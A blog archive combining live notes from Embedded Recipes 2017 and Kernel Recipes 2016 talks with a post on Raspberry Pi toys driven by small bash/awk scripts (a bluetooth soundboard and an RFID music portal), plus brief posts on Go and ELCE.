Dynamic Voltage and Frequency Scaling is a complex part of the work, since it's done on a specific CPU in the SoC, but ARM changed the protocol after some time and did not publish the old one at first.

SCPI (the DVFS driver on this SoC) is now supported on 4.10 though.

Kevin Hilman wrote a new eMMC host driver from the original implementation and public datasheet. It's very performant.

At the end of 2016, Amlogic released a new variant of those SoCs, the S905X, and supporting it was easily done by re-architecting the Device Tree files.

For CVBS (analog video support), support was integrated in 4.10. For HDMI, Amlogic integrated a Synopsys DesignWare HDMI Controller, and a clean dw-hdmi bridge has been published, sharing the code between different SoC families. The PHY was custom though, as well as the HPD.

CEC support was merged using the CEC framework maintained by Hans Verkuil.

The Mali GPU inside the SoC does not have an open driver. The open source kernel driver is available. But the userspace shared binary is delivered as a blob, that has to be compiled by the SoC vendor to customize it.

Work in progress

There is still a lot of work for the Video Display: cursor plane, overlay planes, osd scaling, overlay scaling are missing for example.

The DRM driver only has a single, primary plane, without scaling. Support for scaling, for planes with different sub-sampling (various YUV formats), and for overlay planes is still missing.

In Audio land, S/PDIF input and output is missing. I2S is working for output only through HDMI or external DAC, but the embedded stereo DAC in GXL/GXM or I2S input aren't supported.

Video Hardware Acceleration, while one of the best features of the SoC, is still missing, Neil says. There's at least 6 months of development to have a proper V4L2 driver.

Community

There are a lot of hobbyists hacking on the Odroid-C2 board, and running LibreELEC and Kodi. Many Raspberry Pi oriented projects are also ported to Amlogic boards.

There are upstream contributions from independent hackers. This is also helped by the growing diversity of Single Board Computers (SBC) using these SoCs.

Long-Term Maintenance, or How to (Mis-)Manage Embedded Systems for 10+ Years

by Marc Kleine-Budde

Marc started by asking the audience who had Embedded Systems in the field, for how long, and which ones were still maintained. Then he asked who had to update to fix a vulnerability, and how long it took to deploy.

The context of the talk is systems created by small teams, using custom hardware, and pushing out new products every few years, that need to be supported for more than 10 years.

The traditional Embedded Systems Lifecycle starts with a Component Version Decision, followed by HW/SW development, then the maintenance starts. It's usually the longest phase.

Marc showed graphs of vulnerabilities per-year in the Kernel, glibc and openssl. Despite most vulnerabilities being Denial of Services, it's still a lot. There's also the infamous "rootmydevice" in a proc file that was in a published linux-sunxi kernel from Allwinner.

Don't trust your vendor kernel, Marc says.

Field Observations

vendor kernels are already obsolete at start of project
the workflow for customized pre-built distributions isn't standard
you get the worst of both worlds if you select "longterm" components but don't have an update concept
if your update process isn't proven, it's bad
there's a critical vulnerability in a relevant component at least twice a year
upstream only maintains components for 2 to 5 years
server distros are made for admin interaction, and not suited to embedded systems

It all leads to the conclusion that Continuous Maintenance is very important.

Backporting, while simple at its core — you take a patch and apply it — doesn't scale. As you get more products, versions diverge, as you make local modifications test coverage is reduced, and after a few years, it's almost impossible to decide which upstream fixes are relevant.

If you don't want your product to become part of a botnet, you need to have a few safeguards. You need to have a short time between incident and fix, a low risk of negative side effects, predictable maintenance costs, and a whole process that scales to multiple products.

These are ingredients for a sustainable process: making sure you can upgrade in the field, review security announcements regularly, always use releases maintained by upstream, disable unused components and enable security hardening.

Development Workflow

It's important to submit changes to upstream to reduce maintenance effort.

You need to automate the processes as early as possible: use CI.

When starting a new project, use the development version of upstream projects, so that when you reach completion, it's in stable state, and still maintained, as opposed to already obsoleted.

Every month, do periodic maintenance: integrate maintenance releases in order to be prepared, review security announcements, and evaluate impact on the product.

When you identify a problem, apply the upstream fix, and leverage your automated build, testing and deployment infrastructure to publish.

Marc advises using Jenkins 2 with Pipeline as Code. For test automation, there's kernelci.org or LAVA. For redundant boot, barebox has bootchooser; u-boot and grub can do it with custom scripts, as can UEFI. For the update system, there is RAUC, OSTree or SWUpdate. Finally, there are now many different rollout schedulers like hawkBit, mender.io, resin.io, but you can also use a static server or custom application.

Conclusion

Marc says that simply ignoring the problem does not work. Don't try ad-hoc fixes, it doesn't scale. Customized server distributions aren't fitted to the embedded use case.

What works is upstreaming, process automation and having a proper workflow.

Developing an embedded video application on dual Linux + FPGA architecture

by Christian Charreyre

The application discussed in this talk has high real time and performance constraints. It must be able to merge and synchronize images issued by 2 cameras, with safety constraints. Target latency is less than 200ms, with boot time less than 5s.

Christian says that in a previous video application, they worked on an ARM SoC with gstreamer, but it didn't match the safety requirements, so they decided to go with a hybrid FPGA+linux solution.

Target hardware is a PicoZed, a System on Module based on a Xilinx Zynq, which embeds an ARM processor as well as an FPGA in the SoC. Its software environment is Yocto-based, and does not use the Xilinx-provided solutions Petalinux or Wind River Pulsar Linux, because of their particular quirks. Yocto is now well known and Christian decided to pick up the meta-xilinx layer and start from that instead. All necessary layers are from the OE Layer Index.

FPGA development is done with the Eclipse-based Xilinx Vivado tool, which enables scripting with Tcl.

The AXI bus is used to communicate between the Linux host and the FPGA design. It allows adding devices accessible from Linux, extending the capabilities: for example, a new serial line, dedicated hardware. It also allows dynamically changing the video pipeline by changing the parameters.

Boot mechanism

The PicoZed needs a First Stage Boot Loader (FSBL), before u-boot. This FSBL is generated by the Vivado IDE according to the design. The FSBL then starts u-boot, which starts Linux.

The FPGA can't start alone, and its code (bitstream) is loaded by the FSBL or u-boot. The Xilinx Linux kernel has drivers for devices programmed in the FPGA. It uses device tree files to describe the specific configuration available at the moment. Vivado generates the whole device tree, not just the part for the Programmable Logic (FPGA); it merges the two in a single system.dts file.

It's a good idea to automate the process of rebuilding the device tree after each change in Vivado, Christian says.

The boot comprises several stages before an image is shown (FSBL, u-boot, bitstream loading, kernel start, etc.), making boot time optimization a complex problem. Various techniques were used to reduce boot time. Inside u-boot, the bootstage report was activated, and some device initializations were disabled.

Bootchart was used to profile Linux startup: the kernel size was reduced, the system console removed, and the init scripts reordered. Filesystem checks were bypassed by using a read-only filesystem. SPI bus speed was increased. Other techniques were used, and the 5 second goal was met.

Closing words

While the design of the system was done so that only the part on the FPGA is impacted by the certification process, the bitstream code is still updated through Linux on the network. Therefore code signing was used in the installer and updater mechanisms to protect the integrity of the system.

According to Christian, the project had many unknowns before starting, but those were surmounted. The split design constraint paid off. The choice of the meta-xilinx layer was a good one, because of its good quality. You only need to understand that the device tree is not built within the kernel; once you understand the general structure, it's working well, and the distribution is well tailored to the requirements.

Lightning talks

Atom Linux

by Christophe Blaess

Atom Linux is a new embedded linux distro designed by Christophe. It's a binary distribution, but definitely embedded-oriented. It aims to be industrial-quality.

Atom Linux targets small companies that already have an embedded Linux project, but with poor embedded Linux knowledge. It aims to provide a secure update system (with rollback, factory defaults, etc.). It wants to be power-failure proof with a read-only rootfs, and data backup.

It's easy to configure Christophe says. The base system is already compiled. It provides a UI for configuration. It aims to make custom code integration simple by providing a toolchain in a VM or natively if needed.

The user starts by downloading the base image for his target, then installing the configuration tool. The user configures the base image with a few parameters. The configuration tool merges the prebuilt packages and the user custom code in a new root filesystem image.

This image is then stored in the user's repository (update server), and at first boot, the system does an update.

Currently, the base image builder works, as well as u-boot and the update shell scripts. The first version of the configuration tool is Qt-based, but it's very ugly according to Christophe. He still wants to improve the tool, and rewrite the base image builder as a Yocto layer. Christophe is looking for contributors and asks anyone interested to contact him.

Wayland is coming

by Fabien Lahoudere

Fabien started by saying that he is just a user, not a Wayland developer. Wayland is a protocol for a compositor to talk to its clients. It's aimed as a simpler replacement for X.

Wayland is designed for modern devices, more performant, simpler to use and configure according to Fabien. It's also more secure, supported by toolkits, and the future of Linux distributions. For instance, it prevents keyloggers, that are very easy to implement with X11.

Wayland is more performant, because it has less ping/pong between the compositor and the clients. Weston is the reference implementation. It's a minimal and fast Wayland compositor. You can extend it by using libweston. There's also AsteroidOS and Maynard which are two embedded-oriented Wayland compositors.

It's also possible to use a "legacy" X application through Xwayland. In fact, Fabien did his whole presentation on a small iMX6Solo based board running evince on top of wayland.

Someone from the audience said they recently had to work with QtCompositor, and it was very simple to use.

Process monitoring with systemd

by Jérémy Rosen

Jérémy says systemd is a very good tool for embedded systems. It costs about 6MB of disk space when built with Yocto. It's already integrated in Yocto and Buildroot.

systemd makes it easy to secure processes with capabilities, and limits system calls; it can bind mount files to control exactly what a process sees. It makes it easy to control resources with cgroups, as well as monitoring processes.

Jérémy compared moving from init scripts to systemd to going from svn to git. It requires understanding and re-learning a lot of things, but is really worth it in the end.

systemd provides very fine-grained control on how to kill a unit: which command to send, which signal to send when it doesn't work, what cleanup command to run, etc. You can define what is a normal or abnormal stop. It can restart an app automatically, and rate-limit this. You can also do coredump management and soft watchdog monitoring; systemd also monitors itself with a hardware watchdog.

Fine-grained control of how services interact is also available. You can react to hardware changes, filesystem changes, use socket activation, etc.

Jérémy said monitoring is a solved problem for him in embedded and he does not want to work on custom solutions anymore.

That's it for Embedded Recipes first edition ! Congratulations on reading this far !

awk driven IoT

2017-07-05T00:00:00+02:00

With a Raspberry Pi or other modern single-board computers, you can make very simple toys. I started with the hello world of interactive apps: the soundboard. But even then, I was too ambitious.

The soundpad

Since the main target was kids, I wanted a simple, screen-less toy that would teach the basics of interactivity, as well as serve as a platform for learning. A simple soundboard can be quite useful to learn animal calls for instance, so I was set.

But I also wanted this toy to be wireless and interact with the house. For the first part, I decided to hook up an old bluetooth game controller I had lying around. I was able to detect its keys with evtest pretty quickly and make an inventory of all button keycodes.

For the sounds, I reused the sounds present in the default raspbian scratch installation. There are a few wave files in /usr/share/scratch/Media/Sounds/ that proved useful. I made a few directories with symbolic links to the samples I was interested in. Combining vidir and the previous keycode list, I ensured each wave file name started with a keycode, like this for the Animal sounds:

304-Bird.wav -> /usr/share/scratch/Media/Sounds/Animal/Bird.wav
305-Cricket.wav -> /usr/share/scratch/Media/Sounds/Animal/Cricket.wav
306-Crickets.wav -> /usr/share/scratch/Media/Sounds/Animal/Crickets.wav
307-Dog1.wav -> /usr/share/scratch/Media/Sounds/Animal/Dog1.wav
308-Dog2.wav -> /usr/share/scratch/Media/Sounds/Animal/Dog2.wav
312-Duck.wav -> /usr/share/scratch/Media/Sounds/Animal/Duck.wav
313-Goose.wav -> /usr/share/scratch/Media/Sounds/Animal/Goose.wav
314-Horse.wav -> /usr/share/scratch/Media/Sounds/Animal/Horse.wav
315-HorseGallop.wav -> /usr/share/scratch/Media/Sounds/Animal/HorseGallop.wav
316-Kitten.wav -> /usr/share/scratch/Media/Sounds/Animal/Kitten.wav
317-Meow.wav -> /usr/share/scratch/Media/Sounds/Animal/Meow.wav
318-Owl.wav -> /usr/share/scratch/Media/Sounds/Animal/Owl.wav

In order to interact with the house, I paired a bluetooth soundbar to the raspberry pi.

Once all of this is set up, this is the entirety of the code for the first iteration of the working soundpad (soundboard + joypad):

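#!/bin/bash
# First argument: the directory holding the NNN-Name.wav links.
cd "$1" || exit 1
# evtest prints one line per input event; -o0 keeps its output unbuffered.
stdbuf -o0 evtest /dev/input/event0 | awk -W interactive '
# On key press (last field is 1), field 8 is the keycode: play the matching file.
/EV_KEY/ { if ($NF == 1) { system("paplay " $8 "-*.wav &") } }'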

stdbuf is very useful when playing with pipes where the input command is blocking, but you still want interactivity. It allows you to control i/o buffering.
evtest parses input events.
awk -W interactive has the same role as stdbuf -i0, but for mawk's internal buffering (it's not needed for GNU awk).
when a matching line is found, paplay is used to play the audio through pulseaudio's bluez sink, that was previously configured as default. The filename corresponds to the button keycode.
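
To see why $8 and $NF are the right fields, the sketch below feeds the same awk pattern a few sample lines instead of a live device, and prints the command instead of running it. The sample lines mimic evtest's usual output format, but the timestamps and button name are made up for illustration.

```shell
#!/bin/bash
# Sample lines imitating evtest output (illustrative values, not a real capture).
sample_events() {
    cat <<'EOF'
Event: time 1499241600.000001, type 1 (EV_KEY), code 304 (BTN_SOUTH), value 1
Event: time 1499241600.000002, -------------- SYN_REPORT ------------
Event: time 1499241600.100001, type 1 (EV_KEY), code 304 (BTN_SOUTH), value 0
Event: time 1499241600.100002, -------------- SYN_REPORT ------------
EOF
}

# Same pattern as the soundpad, but print the command rather than run it.
# Field 8 is the numeric keycode, the last field is the value
# (1 = press, 0 = release).
show_commands() {
    awk '/EV_KEY/ { if ($NF == 1) { print "paplay " $8 "-*.wav" } }'
}

sample_events | show_commands
```

Only the press event produces a command; the release and SYN_REPORT lines are ignored, so each button press plays its sound once.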

The last iteration has the same core code, but with a bit more setup: using bluetoothctl and pactl to make sure the controller and the soundbars are properly connected and configured mainly.

It worked, for the most part, but was far from plug-and-play. The soundbar needed to be turned on and put in bluetooth mode. The wireless joypad had to be turned on. It needed constant re-setup of the bluetooth connections, because it lost the pairings regularly. And sometimes the audio would stutter horribly. I tried compiling a more recent version of bluez, to no avail.

So after a few days of demos and sample playing, I binned this project about 9 months ago.

The music portal

Fast forward to today, I had this thing bothering me about modern music and rhymes for kids. With Deezer & Spotify, we have access to a library we could only dream of. But it's impossible for a 2-year-old child to operate, and not even desirable.

Even without online services, the only alternative would be to go back to the audio CDs. But the only functional CD player in our house is the CD-ROM drive in my Desktop computer; I therefore backup all our audio CDs in audio files. Playing those has the same level of complexity (and screen-interaction) as interoperating with streaming services, so it's back to square one.

That's where the music portal comes in. It's a combination of a Violet Mir:ror I had lying around, and a Raspberry PI with a speaker hooked up.

The Mir:ror is a very simple RFID reader. It's basically plug-and-play on Linux, since it sends raw HID events, with the full ID of the tags it reads, and it has audio and visual feedback. I also evaluated using a Skylanders portal, which also sent raw HID events, but its data was much less detailed, with only two bytes of information in the HID events, and the need to do more work to get the full data, and has no audio or visual feedback.

So here is the code of the first version:

#!/bin/bash
sudo stdbuf -o0 hexdump -C /dev/hidraw0 | awk -W interactive '
/02 01 00 00 08 d0 02 1a  03 52 c1 1a 01 00 00 00/ { print "file1 "; play=1; file="file1.mp3" ; }
/02 01 00 00 08 d0 02 1a  03 52 c1 4b ad 00 00 00/ { print "file2 "; play=1; file="file2.mp3" ; }
/02 01 00 00 04 3f d7 5f  35 00 00 00 00 00 00 00/ { print "dir1 "; play=1; file="dir1/*.mp3" ; }
/  02 02 00 00 0. |01 05 00 00 00 00 00 00  00 00 00 00 00 00 00 00/ { print "stop"; system("killall -q mpg321"); }
{
if (play) {
        system("mpg321 -q " file " & ");
        }
play=0 ;
}
'

We use the same stdbuf and awk -W interactive trick as before. Fun fact: I rediscovered this mawk argument by reading the man page while doing this project because I had forgotten about it in only 9 months. I don't think I'll forget it again.
Here we're matching full HID event lines. We don't even bother decoding the payload size, etc., since it all fits on a line matchable by awk.
I used mpg321 because it has the smallest footprint when compared to mpg123, gst-launch, mplayer, vlc, and others.
I used the same symbolic link structure because it's much easier than putting the full file names in the script.
We handle "tag" removal as well as portal shutdown. The Mir:ror automatically shuts down when turned face down.
There are race conditions hiding here. It's not a big deal, it's just a prototype.
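
As a rough illustration of the matching logic described above, here is a minimal sketch expressed in Python rather than awk. It is not the script that runs on the portal: the function name and the return values are hypothetical, the report bytes and placeholder file names are copied from the awk patterns, and reading the first two bytes as "tag removed" or "portal shutdown" is an assumption drawn from those patterns.

```python
# Full 16-byte HID reports copied from the awk patterns above.
# The file names are the same placeholders as in the script.
PLAY = {
    bytes.fromhex("02010000 08d0021a 0352c11a 01000000"): "file1.mp3",
    bytes.fromhex("02010000 08d0021a 0352c14b ad000000"): "file2.mp3",
    bytes.fromhex("02010000 043fd75f 35000000 00000000"): "dir1/*.mp3",
}

# Assumption: this all-zero-payload report is the portal shutdown event.
SHUTDOWN = bytes.fromhex("01050000") + bytes(12)


def action_for(report: bytes):
    """Return ("play", target), ("stop", None), or None for unknown reports."""
    if report in PLAY:
        return ("play", PLAY[report])
    # Assumption: a report starting with 02 02 means a tag was removed.
    if report[:2] == b"\x02\x02" or report == SHUTDOWN:
        return ("stop", None)
    return None
```

A lookup table keyed on the whole report keeps the same "don't decode, just match" spirit as the awk version.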

What could I use after I set up the two included Nanoztags ? I could put RFID stickers on objects; or I could use my visa card; or anything that has an RFID/NFC feature (like my phone). But there are better, available off-the-shelf choices: toys-to-life like Skylanders ! They are already made for kids, are very sturdy, and I managed to snag a few on clearance at ~1€ a piece !

Make sure the Raspberry Pi is connected to your wireless network, so you can add new songs remotely, and throw in a systemd.service for automatic starting, and the toy is finished:

[Unit]
Description=Music Portal

[Service]
Type=simple
ExecStart=/home/pi/musicportal.sh
User=pi
Group=pi
WorkingDirectory=/home/pi
StandardOutput=journal+console
StandardError=journal+console
Restart=always
RestartSec=3


[Install]
WantedBy=multi-user.target

And it's truly plug-and-play: you just need to plug in the Raspberry Pi, and it powers the speaker through USB, as well as the Mir:ror.

Here's a video of the final result:

Last but not least, the title of this article is awk driven IoT. So I integrated librespot, and I can now play songs and rhymes from this online streaming service ! Success ✔

Go Time

2017-02-19T00:00:00+01:00

For the Go 1.8 Release Party in Paris I gave a lightning talk on monotonic clocks. It's essentially a talk version of Russ Cox's design document on monotonic clocks, which is really well written and sourced. You should go read it !

Here are the slides export and their source.

Embedded Linux Conference Europe 2016

2016-10-21T00:00:00+02:00

I was in Berlin last week for ELCE, and it was great. It was a nice mix of talks on many different subjects, and as always you come back with lots of new ideas and improved motivation.

As you know, I took some notes for Kernel Recipes 2016, and lots of people at ELCE told me they were glad to have read them. I have since updated the article with videos and LWN links for future readers.

Since I was recovering from attending dotGo on Monday, and then flying to Berlin, I did not take notes at ELCE this year. But during the conference I ran into Arnout Vandecappelle, Buildroot contributor and fellow Embedded Engineer. He took great notes which he posted on his company's blog:

I attended a few of those talks, and I can tell you he did a great recap.

See you next year !

Kernel Recipes 2016 notes

2016-09-28T00:00:00+02:00

Update 2016-10-21: I've added links to the videos and LWN articles, which are of much higher quality than these live notes.

This year I'm trying a live blog of Kernel Recipes 2016, live from Paris, at Mozilla's headquarters. You can watch the live stream here.

The kernel report

by Jonathan Corbet; video

We've had 5 kernel releases since last November, with 4.8 coming out hopefully on Oct 2nd. There were between 12 and 13k changesets for each release. About 1.5k devs contributed to each release.

The number of developers contributing to each release is stable, growing slowly. For each new release, there are about 200 first-time contributors.

The development process continues to run smoothly, and not much is changing.

Security

Security is a hot topic right now. Jon showed an impressive list of CVE numbers, estimating that the actual number of flaws is about double that.

The current process for fixing security flaws is like a game of whack-a-mole: there are more and more new flaws, and in the end it's not certain you can keep up.

The distributors also aren't playing their part in pushing updates to users.

So vulnerabilities will always be with us, but what is possible is eliminating whole classes of exploits. Examples of this include:

- Post-init read-only memory in 4.6
- Use of GCC plugins in 4.8
- Kernel stack hardening in 4.9
- Hardened usercopy in 4.8
- Reference-count hardening, which is being worked on.

A lot of this originates in grsecurity.net, some of it is being funded by the Core Infrastructure Initiative.

The catch is that there are performance impacts, so it's a tradeoff. So can we convince kernel developers it's worth the cost ? Jonathan is optimistic that the mindsets are changing towards a yes.

Kernel bypass

A new trend is to bypass the kernel stack, for instance in the network stack for people doing High-Frequency-Trading.

Transport over UDP (TOU) is an example of this, enabling applications to make transport protocols in userspace. The QUIC protocol in Chrome is an example of this.

The goal here is to be able to make faster changes in the protocol. For instance, TCP Fast Open has been available for a long time in the kernel, but most devices out there (Android, etc.) have such an old kernel, that nobody is using this.

Another goal is to avoid middlebox interference (for example, they mess with TCP congestion, etc.). So here, the payload is "encrypted" and not understood by those middleboxes, so they can't interfere with it.

The issue with TOU is that we risk having every app (Facebook, Google, etc.) speaking its own protocol, killing interoperability. So the question is will the kernel still be a strong unifying force for the net ?

BPF

The Berkeley Packet Filter is a simple in-kernel virtual machine. Users can load code in the kernel with the bpf() syscall.

It's safe because there are a lot of rules and limitations to make sure BPF programs do not pose a problem: they can't loop, access arbitrary memory, access uninitialized memory, or leak kernel pointers to user space for example.

The original use case of BPF was of course to filter packets. Nowadays it allows system call restriction with seccomp(), perf events filtering, or tracepoint data filtering and analysis. This is finally the Linux "dtrace".

Process

A lot has changed since 2.4. At the time distributors backported lots of code and out-of-tree features.

Since then, the "upstream first" rule and the new regular release cycle (every 10 weeks or so) have helped solve a lot of problems.

Yet, there are still issues. For instance, a phone running the absolute latest release of Android (7.0), is still running kernel 3.10, which was released in June 2013 and is 221k+ patches behind mainline.

So why is this ? Jonathan says that fear of the mainline kernel is one reason. With the rate of change there's the possibility of new bugs and regressions.

Jon then showed a table compiled by Tim Bird showing that most phones have a vast amount of out-of-tree code to forward port: between 1.1M and 3.1M lines of inserted code!

Out-of-tree code might be because upstreaming can take a long time. For example, wakelocks or USB charging aren't upstream. Other changes like scheduler rewrites are simply not upstreamable. The kernel moves too slowly for people shipping phones every 6 months.

This is a collision of two points of view: manufacturers say that "nobody will remember our product next year", while kernel developers say they've been here for 25 years and intend to continue to be here. This is quite a challenge that the community will have to overcome.

GPL enforcement

To sue or not to sue ?

Some say that companies will not comply without the threat of a lawsuit. Others say that lawsuits would just shut down any discussions with companies that might become contributors in the future.

Contributions stats show that the absolute maximum of independent contributors is about 15%, and that the rest of contributions are coming from people being paid by companies to do so. Therefore alienating those companies might not be the best idea.

Corbet put it this way: do we want support for this current device eventually, or do we want support from companies indefinitely ?

entry_*.S : A carefree stroll through kernel entry code

by Borislav Petkov; video

There are a few reasons for entry into the kernel: system calls, interrupts (software/hardware), and architectural exceptions (faults, traps and aborts).

Interrupt or exception entry needs an IDT (Interrupt Descriptor Table); the interrupt number is an index into it, for example.

Legacy syscalls had quite an overhead due to segment-based protections. This evolved with long mode, which requires a flat memory model with paging. Borislav then explains how to set up the MSRs to go into the syscall.

The ABI described is specific to x86 (of which Borislav is a maintainer), including which registers to set up (rcx, rip, r11) in order to do a long mode syscall. Borislav explains what the kernel does on x86. Which flags should be set/reset ? Read his slides (or the kernel code) for a nice description.

entry_SYSCALL_64 …

… is the name of the function that takes 6 arguments in registers that is run once we're in the kernel.

SWAPGS is then executed, GS and FS being the only segments still in use. Then the userspace stack pointer is saved.

Then the kernel stack is set up (with a per-CPU variable), reading the cpu_tss struct appropriately.

Once the stack is set up, the user pt_regs is constructed and handed to helper functions. A full IRET frame is set up in case of preemption.

After that the thread info flags are looked at in case there's a special situation that needs handling, like ptraced syscalls.

Then the syscall table is looked at, using the syscall number in RAX. Depending on the syscall needs, it's called more or less differently.
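
To make the table lookup concrete, here is a toy model in Python. It is only a sketch of the idea, not how the kernel is written: the dictionary, the `dispatch` helper and the single registered handler are hypothetical, while 39 is the getpid number on x86-64 and ENOSYS is the error conventionally returned for an unknown syscall number.

```python
import errno
import os


def sys_getpid():
    """Stand-in handler: the real one lives in the kernel."""
    return os.getpid()


# Toy syscall table indexed by the number that userspace placed in RAX.
SYSCALL_TABLE = {
    39: sys_getpid,  # getpid on x86-64
}


def dispatch(rax, *args):
    """Look up the handler for syscall number `rax` and call it."""
    handler = SYSCALL_TABLE.get(rax)
    if handler is None:
        # Unknown syscall numbers fail with -ENOSYS.
        return -errno.ENOSYS
    return handler(*args)
```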

Once the syscall has been called, there is some exit work, like saving the regs, moving pt_regs on stack, etc.

A new thing on the return path is SYSRET, which is faster than IRET, the latter being implemented in microcode (saving ~80ns in syscall overhead). SYSRET does fewer checks. It depends on the syscall, and on whether it's on the slowpath or fastpath.

If the opportunistic SYSRET fails, the IRET is done, after restoring registers and swapping GS again.

On the legacy path, for 32-bit compat syscalls, there might be a leak of 16bits of ESP, which is fixed with per-CPU ministacks of 64B, which is the cacheline size. Those ministacks are RO-mapped so that IRET faults are promoted and get their own stack[…].

cgroup v2 status update

by Tejun Heo; video

The new cgroup rework started in Sep 2012 with gradual cleanups.

The experimental v2 unified hierarchy support was implemented in Apr 2014.

Finally, the cgroup v2 interface was exposed in 4.5.

Differences in v2

The resource model is now consistent for memory, io, etc. Accounting and control is the same.

Some resources spent can't be charged immediately. For instance, an incoming packet might consume a lot of CPU in the kernel before we know to which cgroup to charge these resources.

There's also a difference in granularity, or delegation. For example, what to do when a cgroup is empty is well defined, with proper notification of the root controllers.

The interface conventions have been unified: for example, for weight-based resource sharing, the interfaces are consistent across controllers.

Cpu controller controversy

The CPU controller is still out of tree. There are disagreements around core v2 design features, see this LWN article for details.

A disagreement comes from page-writeback granularity, i.e. how to tie a specific writeback operation to a specific thread as opposed to a resource domain.

Another main reason is process granularity. The scheduler only deals with threads, while cgroups don't have thread-granularity, only process-level granularity. This is one of the major disagreements.

The scheduler priority control (nice syscall) is a very different type of interface to the cgroup control interface (echo in a file).

Discussion on this subject is still ongoing.

The rest

A new pids controller was added in 4.3. It allows controlling the small resource that is the PID space (15 bits) and prevents its depletion.
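
For a sense of scale, 15 bits of PID space means 32768 possible PIDs. The sketch below works through that number and shows how a limit read from the controller's pids.max file could be interpreted, where the literal string "max" means "no limit". The helper names are hypothetical, and a real check would also read pids.current from the cgroup filesystem.

```python
PID_BITS = 15
PID_SPACE = 1 << PID_BITS  # 2**15 = 32768 possible PIDs


def parse_pids_max(text):
    """Parse the content of a pids.max file: 'max' means unlimited."""
    value = text.strip()
    return None if value == "max" else int(value)


def fork_would_exceed(current, limit):
    """True if creating one more task would go over the cgroup's limit."""
    return limit is not None and current + 1 > limit
```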

Namespace support was added in 4.6, hiding the full cgroup path when you're in a namespace for example. There are still other bugs.

An rdma controller is incoming as well.

Userland support

systemd 232 will start using cgroup v2, including the out-of-tree cpu controller. It can use both cgroup v1 and v2 interfaces at the same time.

libvirt support is being worked on by Tejun Heo as well, who is currently deploying it with systemd at Facebook.

We've had some interesting questions from the audience with regards to some old quirks and security issues in cgroups, but Tejun is quite optimistic that v2 will fix many of those issues and bugs.

Old userland tools will probably be broken once cgroup v2 is the norm, but they are fixable.

from git tag to dnf update

by Konstantin Ryabitsev; video

How is the kernel released ? (presentation)

Step 1: the git tag

It all starts with a signed git tag pushed by Linus. The transport is git+ssh for the push.

It connects to git master, a server in Portland Oregon maintained by the Linux Foundation.

The ssh transport passes the established connection to a gitolite shell. gitolite uses the public key of the connection (through an env variable) to identify the user. Then the user talks to the gitolite daemon.

Before the push is accepted, a two-factor authentication is done via 2fa-val. This daemon allows the user to validate an IP address for a push. It uses the TOTP protocol. The 2fa token is sent through ssh by the user. It allows the user to authorize an IP address for a certain period of time (usually 24h).
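
The TOTP computation itself is small. Below is a minimal sketch of the algorithm as specified in RFC 6238 (HMAC-SHA1 variant), using only the Python standard library. It says nothing about how 2fa-val is actually implemented; the function name and defaults are illustrative.

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238, HMAC-SHA1)."""
    # The moving factor is the number of `step`-second periods since the epoch.
    counter = unix_time // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation (RFC 4226): the low nibble of the last byte
    # selects a 4-byte window, of which the top bit is masked off.
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

Both sides derive the same short-lived code from a shared secret and the current time, which is why the server can validate a token without any extra round trip.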

Once the push is accepted, gitolite passes control to git for the git protocol transfer.

As a post-commit hook, the "grokmirror" software is used to propagate changes to the frontend servers.

grokmirror updates a manifest that is served through httpd (a gzipped json file), on a non-publicly accessible server.

On a mirror server connected through a VPN, the manifest is checked for changes every 15 seconds, and if there's a change, the git repo is pulled.
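
The polling step can be sketched as a comparison between two versions of the manifest. This is an illustration only, not grokmirror's code: it assumes the manifest is a gzipped JSON object mapping repository paths to metadata, and the "fingerprint" field name is an assumption used here to detect changes.

```python
import gzip
import json


def load_manifest(blob: bytes) -> dict:
    """Decode a gzipped JSON manifest into a dict keyed by repository path."""
    return json.loads(gzip.decompress(blob).decode("utf-8"))


def repos_to_pull(old: dict, new: dict) -> list:
    """Return the repositories that are new or whose fingerprint changed."""
    return sorted(
        path
        for path, info in new.items()
        if path not in old
        or old[path].get("fingerprint") != info.get("fingerprint")
    )
```

A mirror would run this comparison on every poll and only pull the repositories it returns.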

On the frontend, the git daemon is running, serving the updated repo.

Step 2: the tarball

To generate the tar, the git archive command is used. The file is then signed with gpg.

kup (kernel uploader) is then used to upload the tarball. Or it can ask the remote to generate the tarball itself from a given tag, saving up lots of bandwidth. Only the signature is then uploaded. Then the archive is compressed and put in the appropriate public directory.

kup uses ssh transport as well to authenticate users. The kup server stores the tarball in temporary storage.

The tarball is then downloaded by the marshall server, and copied over nfs to the pub master server.

The pub master server is mounted over nfs on a Raspberry Pi that watches directory changes and updates the sha256sums file signatures. On marshall, a builder server checks if the git tag and tarball are available and then runs pelican to update the kernel.org frontpage.
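
As an illustration of the checksum step, here is a minimal sketch that produces one line in the format printed by the sha256sum tool (digest, two spaces, file name). The helper name is hypothetical, and the signing of the resulting file is left out.

```python
import hashlib


def sha256sums_line(name: str, data: bytes) -> str:
    """Format one entry the way the sha256sum tool prints it."""
    return f"{hashlib.sha256(data).hexdigest()}  {name}"
```

Anyone downloading a tarball can recompute the digest locally and compare it with the published line.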

Finally, to publicly get the tarballs, you shouldn't use ftp. It is recommended to use https or rsync, or even https://cdn.kernel.org which uses Fastly.

Maintainers Don't Scale

by Daniel Vetter; video, LWN article

I took a break here so you'll only find a summary of the talk. Talk description here

Daniel presents the new model adopted by the open source Intel graphics team to include every regular contributor as Maintainer. His trick ? Give them all commit access.

The foreseen problems failed to materialize. Everything now works smoothly. Can this process be applied elsewhere ?

Patches carved into stone tablets

by Greg Kroah-Hartman; video, LWN article

Why do we use mail to develop the kernel? presentation

Because it is faster than anything else. There are 7 to 8 changes per hour. 75 maintainers took on average 364 patches each.
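
The hourly rate is consistent with the figures from the kernel report earlier in these notes: 12 to 13k changesets per release, and a release every 10 weeks or so. A quick check of the arithmetic, treating the 10-week cycle as an approximation:

```python
# A release cycle of about 10 weeks, expressed in hours.
HOURS_PER_RELEASE = 10 * 7 * 24  # 1680


def changes_per_hour(changesets: int) -> float:
    """Average number of changesets merged per hour over one cycle."""
    return changesets / HOURS_PER_RELEASE


low = changes_per_hour(12_000)   # about 7.1
high = changes_per_hour(13_000)  # about 7.7
```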

There are a lot of reviewers.

A good person knows how to choose good tools. So Greg reviews a few tools.

